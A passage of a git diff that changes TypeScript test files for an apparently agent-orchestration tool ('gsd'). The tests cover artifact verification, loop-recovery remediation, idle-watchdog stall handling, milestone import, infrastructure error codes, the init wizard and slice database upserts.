-    const sliceDir = join(base, ".gsd", "milestones", "M001", "slices", "S01");
-    writeFileSync(join(sliceDir, "S01-SUMMARY.md"), "# Summary\n", "utf-8");
-    writeFileSync(join(sliceDir, "S01-UAT.md"), "# UAT\n", "utf-8");
-    writeFileSync(join(base, ".gsd", "milestones", "M001", "M001-ROADMAP.md"), ROADMAP_COMPLETE, "utf-8");
-    const result = verifyExpectedArtifact("complete-slice", "M001/S01", base);
-    assertTrue(result === true, "SUMMARY + UAT + roadmap [x] should verify as true");
-  } finally {
-    cleanup(base);
-  }
-}
-
-{
-  console.log("\n=== verifyExpectedArtifact: complete-slice — SUMMARY + UAT present but roadmap NOT marked [x] returns false ===");
-  const base = createFixtureBase();
-  try {
-    const sliceDir = join(base, ".gsd", "milestones", "M001", "slices", "S01");
-    writeFileSync(join(sliceDir, "S01-SUMMARY.md"), "# Summary\n", "utf-8");
-    writeFileSync(join(sliceDir, "S01-UAT.md"), "# UAT\n", "utf-8");
-    writeFileSync(join(base, ".gsd", "milestones", "M001", "M001-ROADMAP.md"), ROADMAP_INCOMPLETE, "utf-8");
-    const result = verifyExpectedArtifact("complete-slice", "M001/S01", base);
-    assertTrue(result === false, "roadmap not marked [x] should return false (crash recovery scenario)");
-  } finally {
-    cleanup(base);
-  }
-}
-
-{
-  console.log("\n=== verifyExpectedArtifact: complete-slice — SUMMARY present but UAT missing returns false ===");
-  const base = createFixtureBase();
-  try {
-    const sliceDir = join(base, ".gsd", "milestones", "M001", "slices", "S01");
-    writeFileSync(join(sliceDir, "S01-SUMMARY.md"), "# Summary\n", "utf-8");
-    // no UAT file
-    writeFileSync(join(base, ".gsd", "milestones", "M001", "M001-ROADMAP.md"), ROADMAP_COMPLETE, "utf-8");
-    const result = verifyExpectedArtifact("complete-slice", "M001/S01", base);
-    assertTrue(result === false, "missing UAT should return false");
-  } finally {
-    cleanup(base);
-  }
-}
-
-{
-  console.log("\n=== verifyExpectedArtifact: complete-slice — no roadmap file present is lenient (returns true) ===");
-  const base = createFixtureBase();
-  try {
-    const sliceDir = join(base, ".gsd", "milestones", "M001", "slices", "S01");
-    writeFileSync(join(sliceDir, "S01-SUMMARY.md"), "# Summary\n", "utf-8");
-    writeFileSync(join(sliceDir, "S01-UAT.md"), "# UAT\n", "utf-8");
-    // no roadmap file
-    const result = verifyExpectedArtifact("complete-slice", "M001/S01", base);
-    assertTrue(result === true, "missing roadmap file should be lenient and return true");
-  } finally {
-    cleanup(base);
-  }
-}
-
-// ═══ buildLoopRemediationSteps ═══════════════════════════════════════════════
-
-{
-  console.log("\n=== buildLoopRemediationSteps: execute-task returns concrete steps ===");
-  const base = mkdtempSync(join(tmpdir(), "gsd-loop-remediation-test-"));
-  try {
-    mkdirSync(join(base, ".gsd", "milestones", "M002", "slices", "S03", "tasks"), { recursive: true });
-    const result = buildLoopRemediationSteps("execute-task", "M002/S03/T01", base);
-    assertTrue(result !== null, "should return remediation steps");
-    assertTrue(result!.includes("T01-SUMMARY.md"), "steps mention the summary file");
-    assertTrue(result!.includes("S03-PLAN.md"), "steps mention the slice plan");
-    assertTrue(result!.includes("T01"), "steps mention the task ID");
-    assertTrue(result!.includes("gsd doctor"), "steps include gsd doctor command");
-    // Exact slice plan checkbox syntax (no trailing **)
-    assertTrue(result!.includes('"- [x] **T01:"'), "steps show exact checkbox syntax without trailing **");
-  } finally {
-    rmSync(base, { recursive: true, force: true });
-  }
-}
-
-{
-  console.log("\n=== buildLoopRemediationSteps: plan-slice returns concrete steps ===");
-  const base = mkdtempSync(join(tmpdir(), "gsd-loop-remediation-test-"));
-  try {
-    mkdirSync(join(base, ".gsd", "milestones", "M001", "slices", "S01"), { recursive: true });
-    const result = buildLoopRemediationSteps("plan-slice", "M001/S01", base);
-    assertTrue(result !== null, "should return remediation steps for plan-slice");
-    assertTrue(result!.includes("S01-PLAN.md"), "steps mention the slice plan file");
-    assertTrue(result!.includes("gsd doctor"), "steps include gsd doctor command");
-  } finally {
-    rmSync(base, { recursive: true, force: true });
-  }
-}
-
-{
-  console.log("\n=== buildLoopRemediationSteps: research-slice returns concrete steps ===");
-  const base = mkdtempSync(join(tmpdir(), "gsd-loop-remediation-test-"));
-  try {
-    mkdirSync(join(base, ".gsd", "milestones", "M001", "slices", "S01"), { recursive: true });
-    const result = buildLoopRemediationSteps("research-slice", "M001/S01", base);
-    assertTrue(result !== null, "should return remediation steps for research-slice");
-    assertTrue(result!.includes("S01-RESEARCH.md"), "steps mention the slice research file");
-    assertTrue(result!.includes("gsd doctor"), "steps include gsd doctor command");
-  } finally {
-    rmSync(base, { recursive: true, force: true });
-  }
-}
-
-{
-  console.log("\n=== buildLoopRemediationSteps: unknown type returns null ===");
-  const base = mkdtempSync(join(tmpdir(), "gsd-loop-remediation-test-"));
-  try {
-    const result = buildLoopRemediationSteps("unknown-type", "M001/S01", base);
-    assertEq(result, null, "unknown type returns null");
-  } finally {
-    rmSync(base, { recursive: true, force: true });
-  }
-}
-
-{
-  console.log("\n=== skipExecuteTask: loop-recovery writes blocker when both summary and checkbox missing ===");
-  const base = mkdtempSync(join(tmpdir(), "gsd-loop-recovery-test-"));
-  try {
-    mkdirSync(join(base, ".gsd", "milestones", "M002", "slices", "S03", "tasks"), { recursive: true });
-    const planPath = join(base, ".gsd", "milestones", "M002", "slices", "S03", "S03-PLAN.md");
-    writeFileSync(planPath, [
-      "# S03: Harden guided session",
-      "",
-      "## Tasks",
-      "",
-      "- [ ] **T01: Harden contract usage** `est:30m`",
-      "  Harden guided session contract usage in desktop flow.",
-    ].join("\n"), "utf-8");
-
-    const result = skipExecuteTask(
-      base, "M002", "S03", "T01",
-      { summaryExists: false, taskChecked: false },
-      "loop-recovery",
-      // 3 == MAX_UNIT_DISPATCHES: represents the prevCount when the final
-      // reconciliation path runs (loop detected, reconciling before halting).
-      3,
-    );
-
-    assertTrue(result === true, "loop-recovery should succeed");
-
-    // Blocker summary written
-    const summaryPath = join(base, ".gsd", "milestones", "M002", "slices", "S03", "tasks", "T01-SUMMARY.md");
-    assertTrue(existsSync(summaryPath), "blocker summary should be written");
-    const summaryContent = readFileSync(summaryPath, "utf-8");
-    assertTrue(summaryContent.includes("BLOCKER"), "summary should be a blocker placeholder");
-    assertTrue(summaryContent.includes("loop-recovery"), "summary should mention the recovery reason");
-
-    // Checkbox marked
-    const planContent = readFileSync(planPath, "utf-8");
-    assertTrue(planContent.includes("- [x] **T01:"), "T01 checkbox should be marked [x] after loop-recovery");
-  } finally {
-    rmSync(base, { recursive: true, force: true });
-  }
-}
-
-// ═══ verifyExpectedArtifact: hook unit types ═════════════════════════════════
-
-console.log("\n=== verifyExpectedArtifact: hook types always return true ===");
-
-{
-  const base = createFixtureBase();
-  try {
-    // Hook units don't have standard artifacts — they should always pass
-    const result1 = verifyExpectedArtifact("hook/code-review", "M001/S01/T01", base);
-    assertTrue(result1, "hook/code-review should always return true");
-
-    const result2 = verifyExpectedArtifact("hook/simplify", "M001/S01/T02", base);
-    assertTrue(result2, "hook/simplify should always return true");
-
-    const result3 = verifyExpectedArtifact("hook/custom-hook", "M001/S01", base);
-    assertTrue(result3, "hook/custom-hook at slice level should return true");
-  } finally {
-    rmSync(base, { recursive: true, force: true });
-  }
-}
-
-report();
diff --git a/src/resources/extensions/gsd/tests/idle-watchdog-stall-override.test.ts b/src/resources/extensions/gsd/tests/idle-watchdog-stall-override.test.ts
new file mode 100644
index 000000000..34720c9d1
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/idle-watchdog-stall-override.test.ts
@@ -0,0 +1,125 @@
+/**
+ * Regression tests for #2527: idle watchdog stalled-tool detection.
+ *
+ * Bug 1: When a tool is stalled longer than idle_timeout, the watchdog
+ * notifies but falls through to detectWorkingTreeActivity(), which
+ * resets lastProgressAt if files were modified earlier. Recovery is
+ * never called — the session burns tokens indefinitely.
+ *
+ * Bug 2: After async recoverTimedOutUnit(), pauseAuto/stopAuto may set
+ * s.currentUnit = null, but the next line accesses .startedAt — crash.
+ *
+ * These tests verify the auto-timers.ts source contains the structural
+ * fixes: the stalledToolDetected flag, clearInFlightTools() call, the
+ * filesystem-check guard, and the null guard after recovery.
+ */
+
+import { readFileSync } from "node:fs";
+import { join } from "node:path";
+import { test, describe } from "node:test";
+import assert from "node:assert/strict";
+
+const TIMERS_SRC = readFileSync(
+  join(import.meta.dirname, "..", "auto-timers.ts"),
+  "utf-8",
+);
+
+// ═══ Bug 1: stalledToolDetected flag prevents filesystem-activity override ═══
+
+describe("#2527 Bug 1: stalled tool should not be overridden by filesystem activity", () => {
+  test("auto-timers.ts imports clearInFlightTools", () => {
+    assert.ok(
+      TIMERS_SRC.includes("clearInFlightTools"),
+      "clearInFlightTools must be imported from auto-tool-tracking",
+    );
+  });
+
+  test("auto-timers.ts declares stalledToolDetected flag", () => {
+    assert.ok(
+      TIMERS_SRC.includes("stalledToolDetected"),
+      "stalledToolDetected flag must exist in idle watchdog",
+    );
+  });
+
+  test("stalled tool sets flag to true", () => {
+    // The flag must be set before the filesystem check
+    const flagSet = TIMERS_SRC.indexOf("stalledToolDetected = true");
+    assert.ok(flagSet > -1, "stalledToolDetected must be set to true when tool is stalled");
+
+    const notify = TIMERS_SRC.indexOf("Stalled tool detected:");
+    assert.ok(flagSet < notify, "flag must be set before the stall notification");
+  });
+
+  test("stalled tool calls clearInFlightTools", () => {
+    // clearInFlightTools() must be called when tool is stalled, so subsequent
+    // watchdog ticks don't re-detect the same stale entries
+    const clearCall = TIMERS_SRC.indexOf("clearInFlightTools()");
+    assert.ok(clearCall > -1, "clearInFlightTools() must be called when tool is stalled");
+
+    const flagSet = TIMERS_SRC.indexOf("stalledToolDetected = true");
+    assert.ok(
+      Math.abs(clearCall - flagSet) < 200,
+      "clearInFlightTools() should be near stalledToolDetected = true",
+    );
+  });
+
+  test("filesystem-activity check is guarded by stalledToolDetected", () => {
+    // The detectWorkingTreeActivity check must be skipped when stalledToolDetected is true
+    assert.ok(
+      TIMERS_SRC.includes("!stalledToolDetected && detectWorkingTreeActivity"),
+      "detectWorkingTreeActivity must be guarded by !stalledToolDetected",
+    );
+  });
+
+  test("control flow: stalled tool → skip filesystem check → reach recovery", () => {
+    // Verify the structural ordering: flag declaration → stall block → guarded fs check → recovery
+    const flagDecl = TIMERS_SRC.indexOf("let stalledToolDetected = false");
+    const stallBlock = TIMERS_SRC.indexOf("stalledToolDetected = true");
+    const fsGuard = TIMERS_SRC.indexOf("!stalledToolDetected && detectWorkingTreeActivity");
+    const recovery = TIMERS_SRC.indexOf("recoverTimedOutUnit(ctx, pi, unitType, unitId, \"idle\"");
+
+    assert.ok(flagDecl > -1, "flag declaration must exist");
+    assert.ok(flagDecl < stallBlock, "flag declared before stall block");
+    assert.ok(stallBlock < fsGuard, "stall block before filesystem guard");
+    assert.ok(fsGuard < recovery, "filesystem guard before recovery call");
+  });
+});
+
+// ═══ Bug 2: null guard after async recoverTimedOutUnit ═══════════════════════
+
+describe("#2527 Bug 2: null guard after async recovery prevents crash", () => {
+  test("idle watchdog has null guard after recoverTimedOutUnit", () => {
+    // Find the idle recovery call
+    const idleRecovery = TIMERS_SRC.indexOf(
+      'recoverTimedOutUnit(ctx, pi, unitType, unitId, "idle"',
+    );
+    assert.ok(idleRecovery > -1, "idle recovery call must exist");
+
+    // The null guard must appear between the recovery call and the next
+    // writeUnitRuntimeRecord that accesses s.currentUnit.startedAt
+    const afterRecovery = TIMERS_SRC.slice(idleRecovery, idleRecovery + 400);
+    assert.ok(
+      afterRecovery.includes("if (!s.currentUnit) return"),
+      "null guard for s.currentUnit must exist after idle recoverTimedOutUnit",
+    );
+  });
+
+  test("null guard is between recovery and writeUnitRuntimeRecord", () => {
+    const idleRecovery = TIMERS_SRC.indexOf(
+      'recoverTimedOutUnit(ctx, pi, unitType, unitId, "idle"',
+    );
+    const afterRecovery = TIMERS_SRC.slice(idleRecovery);
+
+    const recoveredReturn = afterRecovery.indexOf('if (recovery === "recovered") return');
+    const nullGuard = afterRecovery.indexOf("if (!s.currentUnit) return");
+    const writeRecord = afterRecovery.indexOf("writeUnitRuntimeRecord(s.basePath");
+
+    assert.ok(recoveredReturn > -1, "recovered return must exist");
+    assert.ok(nullGuard > -1, "null guard must exist");
+    assert.ok(writeRecord > -1, "writeUnitRuntimeRecord must exist after recovery");
+    assert.ok(
+      recoveredReturn < nullGuard && nullGuard < writeRecord,
+      "order must be: recovered-return → null-guard → writeUnitRuntimeRecord",
+    );
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/import-done-milestones.test.ts b/src/resources/extensions/gsd/tests/import-done-milestones.test.ts
new file mode 100644
index 000000000..6ec953714
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/import-done-milestones.test.ts
@@ -0,0 +1,42 @@
+/**
+ * Regression test for #3699 — import milestones with all-done slices as complete
+ *
+ * During DB migration, milestones whose roadmap slices are all marked done
+ * should be imported with status "complete" instead of "active".
+ */
+
+import { describe, test } from 'node:test';
+import assert from 'node:assert/strict';
+import { readFileSync } from 'node:fs';
+import { fileURLToPath } from 'node:url';
+import { dirname, join } from 'node:path';
+
+const __filename = fileURLToPath(import.meta.url);
+const __dirname = dirname(__filename);
+
+const importerSrc = readFileSync(
+  join(__dirname, '..', 'md-importer.ts'),
+  'utf-8',
+);
+
+describe('import done milestones as complete (#3699)', () => {
+  test('all-slices-done check sets milestoneStatus to complete', () => {
+    // The importer should check if all roadmap slices are done
+    assert.match(importerSrc, /roadmap\.slices\.every\(s\s*=>\s*s\.done\)/,
+      'should check roadmap.slices.every(s => s.done)');
+  });
+
+  test('milestoneStatus is set to complete when all slices done', () => {
+    // Find the all-done guard and verify it sets 'complete'
+    const everyIdx = importerSrc.indexOf('roadmap.slices.every(s => s.done)');
+    assert.ok(everyIdx > -1, 'all-slices-done check should exist');
+    const afterCheck = importerSrc.slice(everyIdx, everyIdx + 200);
+    assert.match(afterCheck, /milestoneStatus\s*=\s*'complete'/,
+      'should set milestoneStatus to complete when all slices are done');
+  });
+
+  test('roadmap.slices.length > 0 guard prevents false positives', () => {
+    assert.match(importerSrc, /roadmap\.slices\.length\s*>\s*0/,
+      'should guard against empty slices array');
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/infra-error.test.ts b/src/resources/extensions/gsd/tests/infra-error.test.ts
index 0eb379156..0ec65332d 100644
--- a/src/resources/extensions/gsd/tests/infra-error.test.ts
+++ b/src/resources/extensions/gsd/tests/infra-error.test.ts
@@ -7,10 +7,13 @@ import { isInfrastructureError, INFRA_ERROR_CODES } from "../auto/infra-errors.j
 // ── INFRA_ERROR_CODES constant ───────────────────────────────────────────────
 
 test("INFRA_ERROR_CODES contains the expected codes", () => {
-  for (const code of ["ENOSPC", "ENOMEM", "EROFS", "EDQUOT", "EMFILE", "ENFILE"]) {
+  for (const code of [
+    "ENOSPC", "ENOMEM", "EROFS", "EDQUOT", "EMFILE", "ENFILE",
+    "EAGAIN", "ECONNREFUSED", "ENOTFOUND", "ENETUNREACH",
+  ]) {
     assert.ok(INFRA_ERROR_CODES.has(code), `missing ${code}`);
   }
-  assert.equal(INFRA_ERROR_CODES.size, 6, "unexpected extra codes");
+  assert.equal(INFRA_ERROR_CODES.size, 10, "unexpected extra codes");
 });
 
 // ── isInfrastructureError: code property detection ───────────────────────────
@@ -45,6 +48,31 @@ test("detects ENFILE via code property", () => {
   assert.equal(isInfrastructureError(err), "ENFILE");
 });
 
+test("detects EAGAIN via code property", () => {
+  const err = Object.assign(new Error("resource temporarily unavailable"), { code: "EAGAIN" });
+  assert.equal(isInfrastructureError(err), "EAGAIN");
+});
+
+test("detects EAGAIN in error message fallback", () => {
+  const err = new Error("spawn failed: EAGAIN resource temporarily unavailable");
+  assert.equal(isInfrastructureError(err), "EAGAIN");
+});
+
+test("detects ECONNREFUSED via code property", () => {
+  const err = Object.assign(new Error("connect ECONNREFUSED 127.0.0.1:3000"), { code: "ECONNREFUSED" });
+  assert.equal(isInfrastructureError(err), "ECONNREFUSED");
+});
+
+test("detects ENOTFOUND via code property", () => {
+  const err = Object.assign(new Error("getaddrinfo ENOTFOUND api.example.com"), { code: "ENOTFOUND" });
+  assert.equal(isInfrastructureError(err), "ENOTFOUND");
+});
+
+test("detects ENETUNREACH via code property", () => {
+  const err = Object.assign(new Error("connect ENETUNREACH 2607:f8b0:4004::"), { code: "ENETUNREACH" });
+  assert.equal(isInfrastructureError(err), "ENETUNREACH");
+});
+
 // ── isInfrastructureError: message fallback ──────────────────────────────────
 
 test("falls back to message scanning when no code property", () => {
diff --git a/src/resources/extensions/gsd/tests/init-wizard.test.ts b/src/resources/extensions/gsd/tests/init-wizard.test.ts
index cf10d2754..c17300682 100644
--- a/src/resources/extensions/gsd/tests/init-wizard.test.ts
+++ b/src/resources/extensions/gsd/tests/init-wizard.test.ts
@@ -36,19 +36,17 @@ function cleanup(dir: string): void {
 
 // ─── Detection Integration Tests ────────────────────────────────────────────────
 
-test("init-wizard: clean folder detected as state=none", () => {
+test("init-wizard: clean folder detected as state=none", (t) => {
   const dir = makeTempDir("clean");
-  try {
-    const detection = detectProjectState(dir);
-    assert.equal(detection.state, "none");
-    assert.equal(detection.v1, undefined);
-    assert.equal(detection.v2, undefined);
-  } finally {
-    cleanup(dir);
-  }
+  t.after(() => { cleanup(dir); });
+
+  const detection = detectProjectState(dir);
+  assert.equal(detection.state, "none");
+  assert.equal(detection.v1, undefined);
+  assert.equal(detection.v2, undefined);
 });
 
-test("init-wizard: v1 .planning/ triggers v1-planning state", () => {
+test("init-wizard: v1 .planning/ triggers v1-planning state", (t) => {
   const dir = makeTempDir("v1");
   try {
     mkdirSync(join(dir, ".planning", "phases", "01"), { recursive: true });
@@ -65,7 +63,7 @@ test("init-wizard: v1 .planning/ triggers v1-planning state", () => {
   }
 });
 
-test("init-wizard: existing .gsd/ with milestones skips init", () => {
+test("init-wizard: existing .gsd/ with milestones skips init", (t) => {
   const dir = makeTempDir("existing");
   try {
     mkdirSync(join(dir, ".gsd", "milestones", "M001"), { recursive: true });
@@ -80,7 +78,7 @@ test("init-wizard: existing .gsd/ with milestones skips init", () => {
   }
 });
 
-test("init-wizard: empty .gsd/ (no milestones) returns v2-gsd-empty", () => {
+test("init-wizard: empty .gsd/ (no milestones) returns v2-gsd-empty", (t) => {
   const dir = makeTempDir("empty-gsd");
   try {
     mkdirSync(join(dir, ".gsd", "milestones"), { recursive: true });
@@ -94,7 +92,7 @@ test("init-wizard: empty .gsd/ (no milestones) returns v2-gsd-empty", () => {
   }
 });
 
-test("init-wizard: project signals populate from Node.js project", () => {
+test("init-wizard: project signals populate from Node.js project", (t) => {
   const dir = makeTempDir("node-project");
   try {
     writeFileSync(
@@ -121,11 +119,11 @@ test("init-wizard: project signals populate from Node.js project", () => {
   }
 });
 
-test("init-wizard: v2 .gsd/ preferences detected", () => {
+test("init-wizard: v2 .gsd/ preferences detected", (t) => {
   const dir = makeTempDir("prefs-detect");
   try {
     mkdirSync(join(dir, ".gsd", "milestones"), { recursive: true });
-    writeFileSync(join(dir, ".gsd", "preferences.md"), "---\nversion: 1\nmode: solo\n---\n", "utf-8");
+    writeFileSync(join(dir, ".gsd", "PREFERENCES.md"), "---\nversion: 1\nmode: solo\n---\n", "utf-8");
 
     const detection = detectProjectState(dir);
     assert.ok(detection.v2);
@@ -135,7 +133,7 @@ test("init-wizard: v2 .gsd/ preferences detected", () => {
   }
 });
 
-test("init-wizard: v2 uppercase PREFERENCES.md also detected", () => {
+test("init-wizard: v2 uppercase PREFERENCES.md also detected", (t) => {
   const dir = makeTempDir("prefs-upper");
   try {
     mkdirSync(join(dir, ".gsd", "milestones"), { recursive: true });
@@ -149,7 +147,7 @@ test("init-wizard: v2 uppercase PREFERENCES.md also detected", () => {
   }
 });
 
-test("init-wizard: CONTEXT.md detected in v2", () => {
+test("init-wizard: CONTEXT.md detected in v2", (t) => {
   const dir = makeTempDir("context");
   try {
     mkdirSync(join(dir, ".gsd", "milestones"), { recursive: true });
@@ -163,7 +161,7 @@ test("init-wizard: CONTEXT.md detected in v2", () => {
   }
 });
 
-test("init-wizard: multiple project files detected together", () => {
+test("init-wizard: multiple project files detected together", (t) => {
   const dir = makeTempDir("multi-files");
   try {
     writeFileSync(join(dir, "package.json"), JSON.stringify({ name: "test" }), "utf-8");
@@ -180,7 +178,7 @@ test("init-wizard: multiple project files detected together", () => {
   }
 });
 
-test("init-wizard: v1 with both .planning/ and .gsd/ prioritizes v2", () => {
+test("init-wizard: v1 with both .planning/ and .gsd/ prioritizes v2", (t) => {
   const dir = makeTempDir("both-v1-v2");
   try {
     mkdirSync(join(dir, ".planning", "phases"), { recursive: true });
diff --git a/src/resources/extensions/gsd/tests/insert-slice-no-wipe.test.ts b/src/resources/extensions/gsd/tests/insert-slice-no-wipe.test.ts
new file mode 100644
index 000000000..e70e8e166
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/insert-slice-no-wipe.test.ts
@@ -0,0 +1,88 @@
+import test from 'node:test';
+import assert from 'node:assert/strict';
+
+import { openDatabase, closeDatabase, insertMilestone, insertSlice, getSlice } from '../gsd-db.ts';
+
+test('insertSlice with minimal args does not wipe populated fields', (t) => {
+  t.after(() => { try { closeDatabase(); } catch { /* noop */ } });
+  openDatabase(":memory:");
+
+  insertMilestone({ id: 'M001', title: 'Milestone', status: 'active' });
+
+  // First insert: full data
+  insertSlice({
+    id: 'S01',
+    milestoneId: 'M001',
+    title: 'Auth flow',
+    status: 'in-progress',
+    risk: 'high',
+    demo: 'Login page renders.',
+    sequence: 3,
+    planning: {
+      goal: 'Secure authentication',
+      successCriteria: 'All tests pass',
+      proofLevel: 'integration',
+      integrationClosure: 'Fully integrated',
+      observabilityImpact: 'Metrics available',
+    },
+  });
+
+  const before = getSlice('M001', 'S01');
+  assert.ok(before, 'slice should exist after first insert');
+  assert.equal(before.title, 'Auth flow');
+  assert.equal(before.demo, 'Login page renders.');
+  assert.equal(before.risk, 'high');
+
+  // Second insert: minimal "ensure exists" call (mirrors complete-task.ts usage)
+  insertSlice({ id: 'S01', milestoneId: 'M001' });
+
+  const after = getSlice('M001', 'S01');
+  assert.ok(after, 'slice should still exist after second insert');
+
+  // These must NOT be wiped to empty strings
+  assert.equal(after.title, 'Auth flow', 'title must survive minimal re-insert');
+  assert.equal(after.demo, 'Login page renders.', 'demo must survive minimal re-insert');
+  assert.equal(after.risk, 'high', 'risk must survive minimal re-insert');
+  assert.equal(after.sequence, 3, 'sequence must survive minimal re-insert');
+
+  // Planning fields must also survive
+  assert.equal(after.goal, 'Secure authentication', 'goal must survive minimal re-insert');
+  assert.equal(after.success_criteria, 'All tests pass', 'success_criteria must survive');
+  assert.equal(after.proof_level, 'integration', 'proof_level must survive');
+  assert.equal(after.integration_closure, 'Fully integrated', 'integration_closure must survive');
+  assert.equal(after.observability_impact, 'Metrics available', 'observability_impact must survive');
+});
+
+test('insertSlice ON CONFLICT preserves completed status', (t) => {
+  t.after(() => { try { closeDatabase(); } catch { /* noop */ } });
+  openDatabase(":memory:");
+
+  insertMilestone({ id: 'M001', title: 'Milestone', status: 'active' });
+
+  insertSlice({ id: 'S01', milestoneId: 'M001', title: 'Done slice', status: 'complete' });
+
+  // Re-insert with pending status (default) should NOT overwrite complete
+  insertSlice({ id: 'S01', milestoneId: 'M001' });
+
+  const after = getSlice('M001', 'S01');
+  assert.ok(after);
+  assert.equal(after.status, 'complete', 'completed status must not be overwritten');
+});
+
+test('insertSlice ON CONFLICT allows explicit updates to non-empty values', (t) => {
+  t.after(() => { try { closeDatabase(); } catch { /* noop */ } });
+  openDatabase(":memory:");
+
+  insertMilestone({ id: 'M001', title: 'Milestone', status: 'active' });
+
+  insertSlice({ id: 'S01', milestoneId: 'M001', title: 'Original', demo: 'Old demo', risk: 'low' });
+
+  // Explicit update with real values should overwrite
+  insertSlice({ id: 'S01', milestoneId: 'M001', title: 'Updated', demo: 'New demo', risk: 'high' });
+
+  const after = getSlice('M001', 'S01');
+  assert.ok(after);
+  assert.equal(after.title, 'Updated', 'explicit title update should apply');
+  assert.equal(after.demo, 'New demo', 'explicit demo update should apply');
+  assert.equal(after.risk, 'high', 'explicit risk update should apply');
+});
diff --git a/src/resources/extensions/gsd/tests/integration-edge.test.ts b/src/resources/extensions/gsd/tests/integration-edge.test.ts
index befa0779f..d3a1ecf24 100644
--- a/src/resources/extensions/gsd/tests/integration-edge.test.ts
+++ b/src/resources/extensions/gsd/tests/integration-edge.test.ts
@@ -19,9 +19,8 @@ import {
   formatDecisionsForPrompt,
   formatRequirementsForPrompt,
 } from '../context-store.ts';
-import { createTestContext } from './test-helpers.ts';
-
-const { assertEq, assertTrue, report } = createTestContext();
+import { describe, test, beforeEach, afterEach } from 'node:test';
+import assert from 'node:assert/strict';
 
 // ─── Fixture Helper ────────────────────────────────────────────────────────
 
@@ -48,8 +47,7 @@ function generateDecisionsMarkdown(count: number): string {
 // Edge Case 1: Empty Project
 // ═══════════════════════════════════════════════════════════════════════════
 
-console.log('\n=== integration-edge: empty project ===');
-{
+test('integration-edge: empty project', () => {
   const base = mkdtempSync(join(tmpdir(), 'gsd-int-edge-empty-'));
   const gsdDir = join(base, '.gsd');
   mkdirSync(gsdDir, { recursive: true });
@@ -59,55 +57,54 @@ console.log('\n=== integration-edge: empty project ===');
   try {
     // Open DB first so migrateFromMarkdown doesn't auto-create at default path
     openDatabase(dbPath);
-    assertTrue(isDbAvailable(), 'empty: DB available after open');
+    assert.ok(isDbAvailable(), 'empty: DB available after open');
 
     // Migrate with no markdown files on disk
     const result = migrateFromMarkdown(base);
 
-    assertEq(result.decisions, 0, 'empty: 0 decisions imported');
-    assertEq(result.requirements, 0, 'empty: 0 requirements imported');
-    assertEq(result.artifacts, 0, 'empty: 0 artifacts imported');
+    assert.deepStrictEqual(result.decisions, 0, 'empty: 0 decisions imported');
+    assert.deepStrictEqual(result.requirements, 0, 'empty: 0 requirements imported');
+    assert.deepStrictEqual(result.artifacts, 0, 'empty: 0 artifacts imported');
 
     // Query decisions → empty array
     const decisions = queryDecisions();
-    assertEq(decisions.length, 0, 'empty: queryDecisions returns empty array');
+    assert.deepStrictEqual(decisions.length, 0, 'empty: queryDecisions returns empty array');
 
     // Query requirements → empty array
     const requirements = queryRequirements();
-    assertEq(requirements.length, 0, 'empty: queryRequirements returns empty array');
+    assert.deepStrictEqual(requirements.length, 0, 'empty: queryRequirements returns empty array');
 
     // Query with scope filters → still empty, no crash
     const scopedDecisions = queryDecisions({ milestoneId: 'M001' });
-    assertEq(scopedDecisions.length, 0, 'empty: scoped queryDecisions returns empty');
+    assert.deepStrictEqual(scopedDecisions.length, 0, 'empty: scoped queryDecisions returns empty');
 
     const scopedRequirements = queryRequirements({ sliceId: 'S01' });
-    assertEq(scopedRequirements.length, 0, 'empty: scoped queryRequirements returns empty');
+    assert.deepStrictEqual(scopedRequirements.length, 0, 'empty: scoped queryRequirements returns empty');
 
     // Format empty results → empty strings
     const formattedD = formatDecisionsForPrompt([]);
     const formattedR = formatRequirementsForPrompt([]);
-    assertEq(formattedD, '', 'empty: formatDecisionsForPrompt returns empty string');
-    assertEq(formattedR, '', 'empty: formatRequirementsForPrompt returns empty string');
+    assert.deepStrictEqual(formattedD, '', 'empty: formatDecisionsForPrompt returns empty string');
+    assert.deepStrictEqual(formattedR, '', 'empty: formatRequirementsForPrompt returns empty string');
 
     // Format with actual empty query results
     const formattedD2 = formatDecisionsForPrompt(decisions);
     const formattedR2 = formatRequirementsForPrompt(requirements);
-    assertEq(formattedD2, '', 'empty: format of empty query decisions is empty string');
-    assertEq(formattedR2, '', 'empty: format of empty query requirements is empty string');
+    assert.deepStrictEqual(formattedD2, '', 'empty: format of empty query decisions is empty string');
+    assert.deepStrictEqual(formattedR2, '', 'empty: format of empty query requirements is empty string');
 
     closeDatabase();
   } finally {
     closeDatabase();
     rmSync(base, { recursive: true, force: true });
   }
-}
+});
 
 // ═══════════════════════════════════════════════════════════════════════════
 // Edge Case 2: Partial Migration (decisions only, no requirements)
 // ═══════════════════════════════════════════════════════════════════════════
 
-console.log('\n=== integration-edge: partial migration ===');
-{
+test('integration-edge: partial migration', () => {
   const base = mkdtempSync(join(tmpdir(), 'gsd-int-edge-partial-'));
   const gsdDir = join(base, '.gsd');
   mkdirSync(gsdDir, { recursive: true });
@@ -120,49 +117,48 @@ console.log('\n=== integration-edge: partial migration ===');
 
   try {
     openDatabase(dbPath);
-    assertTrue(isDbAvailable(), 'partial: DB available after open');
+    assert.ok(isDbAvailable(), 'partial: DB available after open');
 
     const result = migrateFromMarkdown(base);
 
     // Decisions imported, requirements skipped gracefully
-    assertTrue(result.decisions === 6, `partial: imported ${result.decisions} decisions, expected 6`);
-    assertEq(result.requirements, 0, 'partial: 0 requirements imported (no file)');
+    assert.ok(result.decisions === 6, `partial: imported ${result.decisions} decisions, expected 6`);
+    assert.deepStrictEqual(result.requirements, 0, 'partial: 0 requirements imported (no file)');
 
     // Decisions queryable
     const decisions = queryDecisions();
-    assertTrue(decisions.length === 6, `partial: queryDecisions returns 6 (got ${decisions.length})`);
+    assert.ok(decisions.length === 6, `partial: queryDecisions returns 6 (got ${decisions.length})`);
 
     const m001Decisions = queryDecisions({ milestoneId: 'M001' });
-    assertTrue(m001Decisions.length > 0, 'partial: M001 decisions non-empty');
-    assertTrue(m001Decisions.length < decisions.length, 'partial: M001 scope filters correctly');
+    assert.ok(m001Decisions.length > 0, 'partial: M001 decisions non-empty');
+    assert.ok(m001Decisions.length < decisions.length, 'partial: M001 scope filters correctly');
 
     // Requirements return empty — no crash
     const requirements = queryRequirements();
-    assertEq(requirements.length, 0, 'partial: queryRequirements returns empty');
